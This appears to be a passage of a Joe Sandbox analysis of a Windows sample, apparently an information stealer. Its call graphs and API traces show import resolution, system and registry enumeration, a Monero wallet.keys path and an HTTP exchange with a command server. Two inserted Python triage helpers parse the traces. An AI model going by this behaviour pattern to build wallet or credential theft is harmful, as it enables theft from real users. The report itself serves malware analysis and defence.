15667->15668 15669 3c1e84 15667->15669 15668->15669 15669->15023 15671 3c7b4d 15670->15671 15672 3c1efe 15670->15672 15791 3c8d20 LocalAlloc 
CharToOemW 15671->15791 15672->15037 15675 3ca740 lstrcpy 15674->15675 15676 3c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15675->15676 15684 3c7c25 15676->15684 15677 3c7d18 15679 3c7d1e LocalFree 15677->15679 15680 3c7d28 15677->15680 15678 3c7c46 GetLocaleInfoA 15678->15684 15679->15680 15681 3ca7a0 lstrcpy 15680->15681 15683 3c7d37 15681->15683 15682 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15682->15684 15683->15050 15684->15677 15684->15678 15684->15682 15685 3ca8a0 lstrcpy 15684->15685 15685->15684 15687 3c2008 15686->15687 15687->15065 15689 3c94b5 15688->15689 15690 3c9493 GetModuleFileNameExA CloseHandle 15688->15690 15691 3ca740 lstrcpy 15689->15691 15690->15689 15692 3c2091 15691->15692 15692->15080 15694 3c7e68 RegQueryValueExA 15693->15694 15695 3c2119 15693->15695 15696 3c7e8e RegCloseKey 15694->15696 15695->15094 15696->15695 15698 3c7fb9 GetLogicalProcessorInformationEx 15697->15698 15699 3c7fd8 GetLastError 15698->15699 15702 3c8029 15698->15702 15706 3c7fe3 15699->15706 15709 3c8022 15699->15709 15700 3c2194 15700->15108 15705 3c89f0 2 API calls 15702->15705 15704 3c89f0 2 API calls 15704->15700 15707 3c807b 15705->15707 15706->15698 15706->15700 15792 3c89f0 15706->15792 15795 3c8a10 GetProcessHeap RtlAllocateHeap 15706->15795 15708 3c8084 wsprintfA 15707->15708 15707->15709 15708->15700 15709->15700 15709->15704 15711 3c220f 15710->15711 15711->15122 15713 3c89b0 15712->15713 15714 3c814d GlobalMemoryStatusEx 15713->15714 15717 3c8163 15714->15717 15715 3c819b wsprintfA 15716 3c2289 15715->15716 15716->15136 15717->15715 15719 3c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15718->15719 15721 3ca740 lstrcpy 15719->15721 15722 3c230b 15721->15722 15722->15150 15724 3ca740 lstrcpy 15723->15724 15730 3c8229 15724->15730 15725 3c8263 15726 3ca7a0 lstrcpy 15725->15726 15728 3c82dc 15726->15728 15727 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15727->15730 15728->15167 15729 3ca8a0 lstrcpy 15729->15730 15730->15725 15730->15727 15730->15729 
15732 3ca740 lstrcpy 15731->15732 15733 3c835c RegOpenKeyExA 15732->15733 15734 3c83ae 15733->15734 15735 3c83d0 15733->15735 15736 3ca7a0 lstrcpy 15734->15736 15737 3c83f8 RegEnumKeyExA 15735->15737 15738 3c8613 RegCloseKey 15735->15738 15748 3c83bd 15736->15748 15740 3c860e 15737->15740 15741 3c843f wsprintfA RegOpenKeyExA 15737->15741 15739 3ca7a0 lstrcpy 15738->15739 15739->15748 15740->15738 15742 3c8485 RegCloseKey RegCloseKey 15741->15742 15743 3c84c1 RegQueryValueExA 15741->15743 15746 3ca7a0 lstrcpy 15742->15746 15744 3c84fa lstrlen 15743->15744 15745 3c8601 RegCloseKey 15743->15745 15744->15745 15747 3c8510 15744->15747 15745->15740 15746->15748 15749 3ca9b0 4 API calls 15747->15749 15748->15193 15750 3c8527 15749->15750 15751 3ca8a0 lstrcpy 15750->15751 15752 3c8533 15751->15752 15753 3ca9b0 4 API calls 15752->15753 15754 3c8557 15753->15754 15755 3ca8a0 lstrcpy 15754->15755 15756 3c8563 15755->15756 15757 3c856e RegQueryValueExA 15756->15757 15757->15745 15758 3c85a3 15757->15758 15759 3ca9b0 4 API calls 15758->15759 15760 3c85ba 15759->15760 15761 3ca8a0 lstrcpy 15760->15761 15762 3c85c6 15761->15762 15763 3ca9b0 4 API calls 15762->15763 15764 3c85ea 15763->15764 15765 3ca8a0 lstrcpy 15764->15765 15766 3c85f6 15765->15766 15766->15745 15768 3ca740 lstrcpy 15767->15768 15769 3c86bc CreateToolhelp32Snapshot Process32First 15768->15769 15770 3c875d CloseHandle 15769->15770 15771 3c86e8 Process32Next 15769->15771 15772 3ca7a0 lstrcpy 15770->15772 15771->15770 15776 3c86fd 15771->15776 15774 3c8776 15772->15774 15773 3ca8a0 lstrcpy 15773->15776 15774->15225 15775 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15775->15776 15776->15771 15776->15773 15776->15775 15778 3ca7a0 lstrcpy 15777->15778 15779 3c51b5 15778->15779 15780 3b1590 lstrcpy 15779->15780 15781 3c51c6 15780->15781 15796 3b5100 15781->15796 15783 3c51cf 15783->15237 15787 3c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15784->15787 15786 3c76b9 15786->15659 15786->15660 15788 3c7765 
(Continuation of a call graph rendered as a node-to-node edge list; the graph image itself is not part of the text. The call sequences recoverable from the edges are:)
• Registry read: a block just before 3c7780 calls RegQueryValueExA, then 3c7780 calls RegCloseKey.
• Heap helpers: 3c89f0 (GetProcessHeap, HeapFree) and 3c8a10 (GetProcessHeap, RtlAllocateHeap).
• Routine at 3b5119: copies its input with 3ca7a0 (lstrcpy), parses it with 3b47b0 (2 API calls), encodes a buffer with helper 3c8ea0, builds further strings with lstrlen and the helpers 3ca740, 3ca8a0, 3ca920 and 3ca9b0, then calls InternetOpenA and StrCmpCA (3b51fd), InternetConnectA (3b5329) and HttpOpenRequestA (3b5359); each failed step jumps to InternetCloseHandle (3b58b7 or 3b58c4) and the exit path 3b58d9 to 3b5913 (lstrcpy via 3ca7a0).
• Helper 3c8ea0: CryptBinaryToStringA once (3c8ead) to obtain the output length, GetProcessHeap and RtlAllocateHeap (3c8ece) for the buffer, then CryptBinaryToStringA again (3c8f05) to write the encoding; the encoding flag is not captured here.
• A routine spanning 3c0266 to 3c02b8: lstrcpy via 3ca740, 3c8de0 (2 API calls) and the string helpers 3ca920, 3ca8a0 and 3ca9b0.
• Loader chain 3b9880 -> 3b6fb0 -> 3b6d40: 3b6660 calls VirtualAlloc (a second time on one path, 3b6743), 3b69b0 calls LoadLibraryA (3b6a09), 3b6ae0/3b6ba8 call GetProcAddress in a loop with 3c8a10 allocating and 3c89f0 freeing, and the teardown path in 3b6d40 calls VirtualFree (3b6ee6) and FreeLibrary (3b6f26).

Control-flow Graph
(rendered as a block list; the executed/not-executed colouring of the image is not recoverable from the text) Entry block 3c9860-3c9874 calls 3c9750 and branches either to block 3c987a-3c9a8e (calls 3c9780, then GetProcAddress 21 times) or directly to block 3c9a93-3c9af2 (LoadLibraryA 5 times). Each of the five blocks that follow (3c9af4-3c9b08, 3c9b16-3c9b41, 3c9b4f-3c9b63, 3c9b71-3c9b84, 3c9b92-3c9bbc) sits behind a conditional branch and resolves one or two more exports with GetProcAddress (7 further calls, 28 in total); all paths fall through to the exit block 3c9bc1-3c9bc2.
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01082368), ref: 003C98A1
                            • GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003C98BA
                            • GetProcAddress.KERNEL32(74DD0000,010823C8), ref: 003C98D2
                            • GetProcAddress.KERNEL32(74DD0000,01082320), ref: 003C98EA
                            • GetProcAddress.KERNEL32(74DD0000,01082380), ref: 003C9903
                            • GetProcAddress.KERNEL32(74DD0000,01089208), ref: 003C991B
                            • GetProcAddress.KERNEL32(74DD0000,01075A50), ref: 003C9933
                            • GetProcAddress.KERNEL32(74DD0000,01075A10), ref: 003C994C
                            • GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003C9964
                            • GetProcAddress.KERNEL32(74DD0000,010824B8), ref: 003C997C
                            • GetProcAddress.KERNEL32(74DD0000,01082218), ref: 003C9995
                            • GetProcAddress.KERNEL32(74DD0000,010824D0), ref: 003C99AD
                            • GetProcAddress.KERNEL32(74DD0000,010757D0), ref: 003C99C5
                            • GetProcAddress.KERNEL32(74DD0000,01082398), ref: 003C99DE
                            • GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003C99F6
                            • GetProcAddress.KERNEL32(74DD0000,01075790), ref: 003C9A0E
                            • GetProcAddress.KERNEL32(74DD0000,010823B0), ref: 003C9A27
                            • GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003C9A3F
                            • GetProcAddress.KERNEL32(74DD0000,01075870), ref: 003C9A57
                            • GetProcAddress.KERNEL32(74DD0000,01082428), ref: 003C9A70
                            • GetProcAddress.KERNEL32(74DD0000,01075A90), ref: 003C9A88
                            • LoadLibraryA.KERNEL32(01082560,?,003C6A00), ref: 003C9A9A
                            • LoadLibraryA.KERNEL32(01082590,?,003C6A00), ref: 003C9AAB
                            • LoadLibraryA.KERNEL32(010825D8,?,003C6A00), ref: 003C9ABD
                            • LoadLibraryA.KERNEL32(01082578,?,003C6A00), ref: 003C9ACF
                            • LoadLibraryA.KERNEL32(01082548,?,003C6A00), ref: 003C9AE0
                            • GetProcAddress.KERNEL32(75A70000,01082518), ref: 003C9B02
                            • GetProcAddress.KERNEL32(75290000,010825A8), ref: 003C9B23
                            • GetProcAddress.KERNEL32(75290000,01082530), ref: 003C9B3B
                            • GetProcAddress.KERNEL32(75BD0000,010825C0), ref: 003C9B5D
                            • GetProcAddress.KERNEL32(75450000,01075950), ref: 003C9B7E
                            • GetProcAddress.KERNEL32(76E90000,01089188), ref: 003C9B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003C9BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 003C9BAA
Memory Dump Source
• Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                            • Instruction ID: 00f3c0dd61510ac6d8ed5fea76c9b61d48aa509f99cec28f37e5c4d9dd5a519e
                            • Opcode Fuzzy Hash: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                            • Instruction Fuzzy Hash: 9FA18DF5501241AFC308EFA9ED88E7637F9F768380704851AA60DC3224D77DA84AEB13

Control-flow Graph
(rendered as a block list) Entry block 3b45c0-3b4695 calls RtlAllocateHeap and enters the loop header 3b46a0-3b46a6, which either runs the body 3b46ac-3b474a (back edge to 3b46a0) or exits to block 3b474f-3b47a9, which calls VirtualProtect. Neither loop block carries an API call.
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003B479C
                            Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45C7, 003B45D2, 003B45DD, 003B45E8, 003B45F3, 003B4617, 003B4622, 003B462D, 003B4638, 003B4643, 003B4657, 003B4662, 003B466D, 003B4678, 003B4683, 003B46AC, 003B46B7, 003B46C2, 003B46CD, 003B46D8, 003B4713, 003B471E, 003B4729, 003B4734, 003B473F, 003B474F, 003B475A, 003B4765, 003B4770, 003B477B (the same sentence referenced 30 times: from the entry block 003B45C7-003B4683, the loop body 003B46AC-003B473F and the VirtualProtect block 003B474F-003B477B)
Memory Dump Source
• Same source file (00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true) and the same fourteen associated dumps as listed for the previous function.
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
• String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one sentence, repeated 30 times and $-separated in the original)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: ac6fd1e3f900717749ed5f9a575060b7adabffd2454d19313c9bee99136d53e3
                            • Instruction ID: 7448159b976cff37eb024b5a63660f7f6f7fd82fa56f9ee32fd34a0a94ef0172
                            • Opcode Fuzzy Hash: ac6fd1e3f900717749ed5f9a575060b7adabffd2454d19313c9bee99136d53e3
                            • Instruction Fuzzy Hash: 9141E361AC6788EAF636FBE4EC42EDD7B565F8270DB507042EA2092383DFB066084535
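Added example (not part of the report, the sandbox, or the sample's own code): a Python parser for the `control_flow_graph` edge-list lines the report emits for each function, run here on the lines of the 3c9860 and 3b45c0 records above, which are copied into the script as sample input. It rebuilds blocks and edges, expands `Api * N` annotations into call counts, and reports DFS back edges, which is how the loop between 3b46a0-3b46a6 and 3b46ac-3b474a sitting between RtlAllocateHeap and VirtualProtect shows up. The grammar is inferred from the lines on this page (a block starts with a decimal id followed by a `lo-hi` address range, `a->b` is an edge, everything else annotates the current block); the first block listed is taken as the entry.

```python
import re
from collections import Counter

# Constructed samples: the control_flow_graph lines of two function records copied from the
# report (import resolution at 3c9860, RtlAllocateHeap/VirtualProtect at 3b45c0).
CFG_3C9860 = ("control_flow_graph 660 3c9860-3c9874 call 3c9750 663 3c987a-3c9a8e call 3c9780 "
              "GetProcAddress * 21 660->663 664 3c9a93-3c9af2 LoadLibraryA * 5 660->664 663->664 "
              "666 3c9b0d-3c9b14 664->666 667 3c9af4-3c9b08 GetProcAddress 664->667 669 3c9b46-3c9b4d "
              "666->669 670 3c9b16-3c9b41 GetProcAddress * 2 666->670 667->666 671 3c9b4f-3c9b63 "
              "GetProcAddress 669->671 672 3c9b68-3c9b6f 669->672 670->669 671->672 673 3c9b89-3c9b90 "
              "672->673 674 3c9b71-3c9b84 GetProcAddress 672->674 675 3c9bc1-3c9bc2 673->675 "
              "676 3c9b92-3c9bbc GetProcAddress * 2 673->676 674->673 676->675")
CFG_3B45C0 = ("control_flow_graph 764 3b45c0-3b4695 RtlAllocateHeap 781 3b46a0-3b46a6 764->781 "
              "782 3b474f-3b47a9 VirtualProtect 781->782 783 3b46ac-3b474a 781->783 783->781")

RANGE_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

def parse_cfg(line):
    """Split one control_flow_graph line into blocks {id: {range, annot}} and edges [(src, dst)]."""
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur = {}, [], None
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.append((m.group(1), m.group(2)))
        elif t.isdigit() and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            cur = t                                   # new block: '<id> <lo>-<hi>'
            nodes[cur] = {"range": toks[i + 1], "annot": []}
            i += 1
        elif cur is not None:
            nodes[cur]["annot"].append(t)             # API name, 'call', callee, '*', count
        i += 1
    return nodes, edges

def calls_in(node):
    """Expand a block's annotation into one entry per call ('Api * N' becomes N entries)."""
    toks, out, i = node["annot"], [], 0
    while i < len(toks):
        if toks[i] == "call" and i + 1 < len(toks):
            name, i = "call " + toks[i + 1], i + 2    # internal callee address
        else:
            name, i = toks[i], i + 1
        n = 1
        if i + 1 < len(toks) and toks[i] == "*" and toks[i + 1].isdigit():
            n, i = int(toks[i + 1]), i + 2
        out.extend([name] * n)
    return out

def back_edges(nodes, edges, entry):
    """DFS from entry; an edge into a block still on the DFS stack closes a loop."""
    succ = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    state, found = {}, []                              # 1 = on stack, 2 = finished
    def visit(u):
        state[u] = 1
        for v in succ.get(u, []):
            if state.get(v) == 1:
                found.append((u, v))
            elif v not in state:
                visit(v)
        state[u] = 2
    if entry in nodes:
        visit(entry)
    return found

def summarize(line):
    """Block count, edge count, per-call totals and the loops of one function graph."""
    nodes, edges = parse_cfg(line)
    entry = next(iter(nodes))                          # the first block listed is the entry
    loops = back_edges(nodes, edges, entry)
    in_loop = {b for e in loops for b in e}
    calls = Counter()
    for n in nodes.values():
        calls.update(calls_in(n))
    return {"entry": entry, "blocks": len(nodes), "edges": len(edges), "calls": calls,
            "loops": loops, "loop_calls": [c for b in in_loop for c in calls_in(nodes[b])]}

if __name__ == "__main__":
    for line in (CFG_3C9860, CFG_3B45C0):
        print(summarize(line))
```

For 3b45c0 the summary reports one back edge (783 -> 781) with no call inside the loop, so whatever the routine does to the heap buffer between RtlAllocateHeap and VirtualProtect is pure computation; for 3c9860 it reports no loop and 28 GetProcAddress calls against 5 LoadLibraryA calls, the dynamic import resolution the signature list refers to.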

Control-flow Graph
(rendered as a block list) Entry block 3b4880-3b4942 calls 3ca7a0 (lstrcpy), 3b47b0 (lstrlen, InternetCrackUrlA), 3ca740 five times, then InternetOpenA and StrCmpCA. The branch at 3b494b-3b494f (reached directly or via 3b4944) either jumps to 3b4ecb-3b4ef3 (InternetCloseHandle, 3caad0, 3b9ac0) or continues to 3b4955-3b4acd, which assembles strings with 3c8b60, 3ca920, 3ca8a0, 3ca800 and 3ca9b0 and calls InternetConnectA. On success, 3b4aef-3b4b22 (via 3b4ad3-3b4ae3 or 3b4ae5) calls HttpOpenRequestA; 3b4b28-3b4e28 builds the request body with the same string helpers plus 3caad0 and lstrlen and calls HttpSendRequestA; 3b4e32-3b4e5c loops on InternetReadFile, appending each chunk in 3b4e69-3b4ea7 (3ca9b0, 3ca8a0, 3ca800) via the check at 3b4e5e-3b4e65 until the loop exits. The request handle is closed in 3b4e67-3b4eb9, the connection handle in 3b4ebe-3b4ec5 (also the target when HttpOpenRequestA fails) and the session handle in 3b4ecb-3b4ef3, after which the tail 3b4f32-3b4fa2 (3c8990 twice, 3ca7a0, 3ca800 eight times), optionally preceded by 3b4ef5-3b4f2d (3ca820, 3ca9b0, 3ca8a0, 3ca800), releases the buffers.
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B4915
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003D0DDB,00000000,?,?,00000000,?,",00000000,?,0108E7F8), ref: 003B4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B4E49
                            • InternetCloseHandle.WININET(00000000), ref: 003B4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 003B4EC5
                            • HttpOpenRequestA.WININET(00000000,0108E8C8,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B4B15
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • InternetCloseHandle.WININET(00000000), ref: 003B4ECF
                            Strings
Memory Dump Source
• Same source file (00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true) and the same fourteen associated dumps as listed for the previous functions.
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                            • Instruction ID: 7ebfaae00544dc2345e76b75334c3623c4bd0da190f15601e017a699477cb5ee
                            • Opcode Fuzzy Hash: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                            • Instruction Fuzzy Hash: 6712C87291061CABDB16EB90DC92FEEB778AF14304F50419DB106AA091EF702F49CF66
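Added example (not code from the report, the sandbox, or the sample): a Python triage helper that parses the `• Api.MODULE(args), ref: ADDR` lines of the three function records above and decodes the constant arguments that matter when reading them: the GetProcAddress calls grouped by module base (of the 28 names only NtQueryInformationProcess is printed as text, the rest appear as addresses rather than resolved strings), the VirtualProtect protection value 00000100 (PAGE_GUARD, the guard-page flag the signature list refers to) and the WinINet arguments of the C2 routine (InternetOpenA access type 1, InternetConnectA service 3, HttpOpenRequestA flags 00400100, InternetReadFile chunk size 000007CF). The constant names are the documented Windows SDK values; the sample lines are copied from the report; a `?` is an argument the sandbox did not capture, and the script treats the argument words as positional, which is an assumption about the sandbox's output.

```python
import re
from collections import Counter

# Constructed sample: API lines copied from the report's records for 3c9860 (import
# resolution), 3b45c0 (RtlAllocateHeap/VirtualProtect) and 3b4880 (WinINet C2 exchange).
SAMPLE = """\
• GetProcAddress.KERNEL32(74DD0000,01082368), ref: 003C98A1
• GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003C98BA
• GetProcAddress.KERNEL32(74DD0000,010823C8), ref: 003C98D2
• LoadLibraryA.KERNEL32(01082560,?,003C6A00), ref: 003C9A9A
• LoadLibraryA.KERNEL32(01082590,?,003C6A00), ref: 003C9AAB
• GetProcAddress.KERNEL32(75A70000,01082518), ref: 003C9B02
• GetProcAddress.KERNEL32(76E90000,01089188), ref: 003C9B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003C9BB6
• RtlAllocateHeap.NTDLL(00000000), ref: 003B460F
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003B479C
  • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B4915
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B4ABA
• HttpOpenRequestA.WININET(00000000,0108E8C8,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B4B15
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B4E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B4E49
• InternetCloseHandle.WININET(00000000), ref: 003B4EAD
"""

LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)")

# Documented Windows SDK values (assumption: the sandbox prints raw argument words in hex).
PAGE_PROT = {"PAGE_NOACCESS": 0x01, "PAGE_READONLY": 0x02, "PAGE_READWRITE": 0x04,
             "PAGE_EXECUTE": 0x10, "PAGE_EXECUTE_READ": 0x20,
             "PAGE_EXECUTE_READWRITE": 0x40, "PAGE_GUARD": 0x100}
INET_FLAGS = {"INTERNET_FLAG_RELOAD": 0x80000000, "INTERNET_FLAG_NO_CACHE_WRITE": 0x04000000,
              "INTERNET_FLAG_SECURE": 0x00800000, "INTERNET_FLAG_KEEP_CONNECTION": 0x00400000,
              "INTERNET_FLAG_NO_AUTO_REDIRECT": 0x00200000, "INTERNET_FLAG_NO_COOKIES": 0x00080000,
              "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID": 0x2000,
              "INTERNET_FLAG_IGNORE_CERT_CN_INVALID": 0x1000,
              "INTERNET_FLAG_NO_UI": 0x200, "INTERNET_FLAG_PRAGMA_NOCACHE": 0x100}
INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INET_OPEN = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}

def parse_api_lines(text):
    """One dict per '• Api.MODULE(args), ref: ADDR' line; subcall lines keep their caller."""
    rows = []
    for m in LINE_RE.finditer(text):
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        rows.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                     "ref": m.group("ref"), "subcall": m.group("sub")})
    return rows

def hexarg(args, i):
    """args[i] as an int, or None when it is '?' (not captured) or a printed string."""
    if i < len(args) and re.fullmatch(r"[0-9A-Fa-f]+", args[i]):
        return int(args[i], 16)
    return None

def decode_flags(value, table):
    """Name every bit of value found in table; bits the table does not cover stay as hex."""
    if value is None:
        return ["?"]
    names = [n for n, bit in table.items() if (value & bit) == bit]
    covered = 0
    for n in names:
        covered |= table[n]
    if value & ~covered:
        names.append(hex(value & ~covered))
    return names

def triage(text):
    """Summarise the import-resolution, guard-page and WinINet calls in a report excerpt."""
    rows = parse_api_lines(text)
    out = {"getprocaddress_by_module": Counter(), "plaintext_names": [],
           "loadlibrarya_calls": 0, "decoded": {}}
    for r in rows:
        api, a = r["api"], r["args"]
        if api == "GetProcAddress" and len(a) > 1:
            out["getprocaddress_by_module"][a[0]] += 1   # a[0] is the module base (HMODULE)
            if hexarg(a, 1) is None:                     # name printed as text, not a pointer
                out["plaintext_names"].append(a[1])
        elif api == "LoadLibraryA":
            out["loadlibrarya_calls"] += 1
        elif api == "VirtualProtect":                    # (lpAddress, dwSize, flNewProtect, lpflOld)
            prot = decode_flags(hexarg(a, 2), PAGE_PROT)
            if prot == ["PAGE_GUARD"]:                   # PAGE_GUARD is only a modifier
                prot.append("no base protection: call fails or capture is partial")
            out["decoded"]["VirtualProtect"] = {"size": hexarg(a, 1), "protect": prot}
        elif api == "InternetOpenA":                     # dwAccessType is the 2nd argument
            out["decoded"]["InternetOpenA"] = INET_OPEN.get(hexarg(a, 1), "?")
        elif api == "InternetConnectA":                  # dwService is the 6th argument
            out["decoded"]["InternetConnectA"] = INET_SERVICE.get(hexarg(a, 5), "?")
        elif api == "HttpOpenRequestA":                  # dwFlags is the 7th argument
            out["decoded"]["HttpOpenRequestA"] = decode_flags(hexarg(a, 6), INET_FLAGS)
        elif api == "InternetReadFile":                  # dwNumberOfBytesToRead is the 3rd
            out["decoded"]["InternetReadFile"] = {"chunk_bytes": hexarg(a, 2)}
    # the routine's own WinINet calls, sorted by call-site address, give the C2 exchange skeleton
    own = [r for r in rows if r["module"] == "WININET" and r["subcall"] is None]
    out["wininet_sequence"] = [r["api"] for r in sorted(own, key=lambda r: int(r["ref"], 16))]
    return out

if __name__ == "__main__":
    for k, v in triage(SAMPLE).items():
        print(k, v)
```

The HttpOpenRequestA flags decode to INTERNET_FLAG_KEEP_CONNECTION and INTERNET_FLAG_PRAGMA_NOCACHE, and InternetReadFile is called with a 1999-byte buffer inside the read loop, so a proxy log of this exchange shows a keep-alive HTTP (not HTTPS) POST with a Pragma: no-cache header. Windows accepts PAGE_GUARD only as a modifier of another protection constant, so a VirtualProtect line showing 00000100 alone means either the call fails or the sandbox captured only part of the argument; the helper flags that rather than guessing.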
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
Memory Dump Source
• Same source file (00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true) and the same fourteen associated dumps as listed for the previous functions.
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
